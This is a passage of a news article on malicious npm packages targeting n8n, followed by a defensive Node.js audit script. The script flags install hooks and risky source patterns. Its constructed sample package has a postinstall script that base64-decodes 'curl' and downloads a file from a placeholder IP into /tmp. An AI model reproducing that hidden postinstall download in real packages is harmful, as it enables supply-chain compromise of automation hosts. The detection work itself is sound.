
Malicious npm packages target the n8n automation platform in a supply chain attack

“According to security researchers at information security firm Cyera, there were more than 100,000 n8n servers vulnerable to CVE-2026-21858,” Endor researchers said in the post. “We do not know how many of these install npm packages as community nodes in their environments. However, this number shows that the n8n ecosystem is active and thriving.”

Tips for reducing risks

Workflow automation platforms like n8n are widely adopted for their ability to let teams link disparate systems without hand-coding every integration. But the community node ecosystem depends on npm packages and therefore inherits the same risks as any other npm dependency: an install pulls third-party code, and its lifecycle scripts, onto the automation host.

To mitigate exposure, Endor Labs researchers recommended measures such as preferring built-in integrations over community nodes, auditing package metadata and source code before installation, monitoring outbound network activity from automation hosts, and running n8n under isolated service accounts with restricted privileges wherever possible. Endor Labs published a list of indicators of compromise (IOCs), including package names, C2 infrastructure, and malicious files, to support detection efforts. “Even though the malicious packages we know of have been disabled in the past few hours, the attacks may continue and evolve going forward,” Plate noted.
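As an added example (not Endor Labs' or the n8n project's own code), the Node.js script below applies two of the checks listed above to a package before it is installed as a community node: it compares the package name against a known-bad list, flags npm lifecycle scripts that would execute during `npm install`, and scans the shipped source for APIs a node integration rarely needs (process spawning, eval, raw sockets, hard-coded IPs, base64-decoded strings). The IOC list, the two package manifests and the source snippets are constructed placeholders for the example; substitute the package names from the published IOC list before using it.

```javascript
'use strict';
// Added example: pre-install audit for an npm package destined to become an
// n8n community node. Not part of n8n or of Endor Labs' tooling.

// Placeholder IOC list. The entry below is constructed for this example and is
// not a real package; replace it with the names from the published IOC list.
const KNOWN_BAD_PACKAGES = new Set([
  'example-malicious-n8n-node',
]);

// npm lifecycle hooks that run arbitrary code on the host during installation.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source patterns that are unusual in a node integration and deserve a manual read.
const RISKY_PATTERNS = [
  { id: 'child_process', re: /require\(['"]child_process['"]\)|from\s+['"]child_process['"]/ },
  { id: 'eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'raw-socket', re: /require\(['"](?:net|dgram)['"]\)/ },
  { id: 'env-read', re: /process\.env\b/ },
  { id: 'hardcoded-ip', re: /\b(?:\d{1,3}\.){3}\d{1,3}\b/ },
  { id: 'base64-decode', re: /Buffer\.from\([^)]*['"]base64['"]\)/ },
];

// pkgJson: parsed package.json; sourceFiles: { relativePath: fileText } for the
// files in the tarball. Returns a verdict plus the individual findings.
function auditPackage(pkgJson, sourceFiles) {
  const findings = [];

  if (KNOWN_BAD_PACKAGES.has(pkgJson.name)) {
    findings.push({ severity: 'block', check: 'ioc-name',
      detail: `package ${pkgJson.name} is on the IOC list` });
  }

  const scripts = pkgJson.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ severity: 'block', check: 'install-hook',
        detail: `${hook}: ${scripts[hook]}` });
    }
  }

  for (const [path, text] of Object.entries(sourceFiles)) {
    for (const { id, re } of RISKY_PATTERNS) {
      if (re.test(text)) {
        findings.push({ severity: 'review', check: id, detail: `${path} matches ${id}` });
      }
    }
  }

  const verdict = findings.some((f) => f.severity === 'block') ? 'block'
    : findings.length > 0 ? 'review' : 'allow';
  return { verdict, findings };
}

// Constructed sample inputs (not real packages).
const CLEAN_PKG = {
  name: 'n8n-nodes-example-clean',
  version: '1.0.0',
  scripts: { build: 'tsc', lint: 'eslint .' },
};
const CLEAN_SRC = {
  'dist/nodes/Example.node.js':
    'module.exports = { description: { displayName: "Example" }, execute() { return [[]]; } };',
};

const SUSPECT_PKG = {
  name: 'n8n-nodes-example-suspect',
  version: '1.0.0',
  scripts: { postinstall: 'node setup.js' },
};
const SUSPECT_SRC = {
  'setup.js': [
    'const cp = require("child_process");',
    'const p = Buffer.from("Y3VybA==", "base64").toString();',
    'cp.exec(p + " http://203.0.113.10/x -o /tmp/x");',
  ].join('\n'),
};

for (const [pkg, src] of [[CLEAN_PKG, CLEAN_SRC], [SUSPECT_PKG, SUSPECT_SRC]]) {
  const { verdict, findings } = auditPackage(pkg, src);
  console.log(`${pkg.name}: ${verdict}`);
  for (const f of findings) console.log(`  [${f.severity}] ${f.check}: ${f.detail}`);
}
```

A `block` verdict means the package should not be installed without a human reading the flagged script or file; `review` findings are heuristics and produce false positives (a legitimate node may read `process.env` for configuration), so treat them as a prompt to inspect, not as proof of compromise. The audit covers only what is in the tarball; egress monitoring on the automation host remains a separate control.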
